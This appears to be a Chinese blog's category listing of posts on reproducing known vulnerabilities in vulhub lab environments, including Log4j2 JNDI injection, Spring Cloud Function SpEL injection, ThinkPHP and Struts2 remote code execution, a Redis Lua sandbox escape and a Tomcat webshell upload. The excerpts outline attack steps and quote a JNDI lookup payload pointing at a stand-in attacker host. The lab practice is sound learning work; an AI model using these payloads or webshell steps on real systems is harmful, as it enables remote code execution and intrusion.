vulhub漏洞复现
文章平均质量分 55
YiHua_yiye
这个作者很懒,什么都没留下…
展开
-
GitLab 任意文件读取漏洞(CVE-2016-9086)
访问"http://192.168.233.129:8080" 访问GitLab主页 默认管理员口令"root:vulhub123456"新建项目 输入项目名称 点击 GitLab export。启动一台kali机 192.168.233.129。上传test.tar.gz文件。在vulhub靶场启动环境。原创 2023-10-11 21:33:25 · 145 阅读 · 0 评论 -
Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞复现
Spring Cloud Function是一个用于构建和部署基于函数的微服务的框架。它使用SpEL表达式来处理函数的输入和输出。SpEL是一种强大的表达式语言,它允许开发人员在运行时动态地计算表达式。由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。原创 2023-10-27 22:55:25 · 278 阅读 · 1 评论 -
Log4j2 JNDI 注入漏洞(CVE-2021-44228)漏洞复现
Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。Log4j是什么?JNDI又是什么?Log4j2是一个Java日志框架,用于在应用程序中记录和管理日志信息。Log4j2被广泛应用于Java项目中,帮助开发人员进行日志记录和故障排查。原创 2023-10-19 16:28:06 · 148 阅读 · 0 评论 -
ThinkPHP5 5.0.23 远程代码执行漏洞复现
是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功。id是我们执行的命令,可更换我们需要的命令。5.0.23和5.1.31之前的所有版本。改变传参方式 GET改为POST。访问靶机ip+端口号8080。使用burp抓到首页的包。原创 2023-09-01 16:28:04 · 401 阅读 · 0 评论 -
Redis Lua沙盒绕过命令执行(CVE-2022-0543)
不同环境下的liblua库路径不同,我们需要指定一个正确的路径。而在Vulhub环境(Ubuntu fiocal)中,这个路径是。,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象。环境启动后,我们到另一台kail机连接redis。连接成功之后使用使用。原创 2023-09-02 20:56:44 · 161 阅读 · 0 评论 -
tomcat8 后台getshell漏洞复现
打开哥斯拉 生成jsp木马并保存。在url栏加上jmuma.jsp。找到刚刚jsp木马存放的位置。此时复制连接,用哥斯拉连接。将zip后缀改为war。在此位置上传war包。原创 2023-09-03 20:14:30 · 227 阅读 · 0 评论 -
vulhub struts2 s2-001漏洞复现
该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。执行任意命令执行的是new java.lang.String[]{"pwd"}中的pwd命令,我们只需将pwd命令替换成我们想要的命令即可。可以看到环境启动成功。原创 2023-09-01 10:02:30 · 295 阅读 · 0 评论